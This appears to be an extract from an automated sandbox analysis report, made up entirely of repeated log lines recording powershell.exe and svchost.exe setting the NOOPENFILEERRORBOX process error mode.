          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
